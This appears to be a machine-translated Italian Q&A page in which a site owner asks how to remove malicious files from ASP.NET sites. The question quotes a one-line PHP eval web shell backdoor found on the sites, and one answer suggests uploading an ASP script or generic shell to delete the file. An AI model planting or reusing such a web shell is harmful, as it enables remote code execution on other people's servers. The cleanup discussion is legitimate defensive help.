file dannoso sui miei siti web, non posso cancellarlo [duplicato]

Question

file dannoso sui miei siti web, non posso cancellarlo [duplicato]

#1 da (0 voti)
#2 da (0 voti)

0

Circa 10 giorni fa ho visto 2 file sconosciuti sui miei siti Web (siti Web ASP.NET).

si sono diffusi su tutti e 3 i miei siti Web e li hanno posizionati nella cartella CSS.

Il primo era con il nome di "Paths.php" con questo codice in esso.

500 <?php @eval($_POST['360']);?>

Quando ho cercato su Google il codice, ho scoperto che si tratta di una sorta di backdoor che è in grado di inviare tutto ciò che desidera tramite un URL che indirizza il file dannoso. Quindi l'ho cancellato immediatamente.

Ma il secondo file che ha il nome di 'nul.doc.asp', Che non ero in grado di vedere il suo codice o addirittura cancellarlo, è chiamato in un modo che non posso rinominare, modificare, spostare , cancella, il server dice che non può raggiungerlo.

Sono davvero disperato di liberarmene senza alcuna fortuna, ho persino contattato l'assistenza clienti e non hanno fatto nulla in 10 giorni.

Quindi puoi aiutarmi ragazzi sbarazzandoci di esso?

P.S Ho persino provato a cancellare un intero sito Web, tutto è stato cancellato ma il file.

asp.net backdoor

posta Remy Jouni 20.10.2016 - 02:52

fonte

2 risposte

Leggi altre domande sui tag asp.net backdoor

L'invio di una password temporanea quando gli utenti si sono registrati per la prima volta - va bene per qualcosa? Prevenire le blacklist con simulazioni di phishing

score 0 · Answer 1

Che ne dici di caricarti un po 'di codice shell che cancellerebbe il file?

Qualcosa come deleteThaFile.asp:

<%
     Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
     Call oFileSys.DeleteFile("nul.doc.asp", True)
%>

Sarebbe d'aiuto?

Potresti anche usare FileSystemObject per ottenere maggiori informazioni sul file (e altri file) per capire meglio perché non può essere cancellato.

Potresti anche distribuire un po 'di shell ASP generica come file manager, per vedere cosa si può fare sul file.

score 0 · Answer 2

Presumo che tu sia su un server Windows 2008/2012 con interfaccia utente completa.

Dovresti essere in grado di fare clic con il tasto destro del mouse - > Proprietà - > Scheda Sicurezza - > Pulsante avanzato - > Scheda Proprietario.

Da questa scheda, dovresti essere in grado di assegnare la proprietà al tuo utente. Da lì, dovresti riuscire a rimuoverlo.

Se non hai un'interfaccia utente e stai utilizzando il server core ecc, puoi eseguire: TAKEOWN / F nul.doc.asp

Prima di eliminarlo, una volta che avrai la proprietà, probabilmente vorremmo dargli un'occhiata, solo per vedere cosa sta succedendo. Quindi rimuovilo o, per lo meno, rinominalo.

Spero che ti aiuti.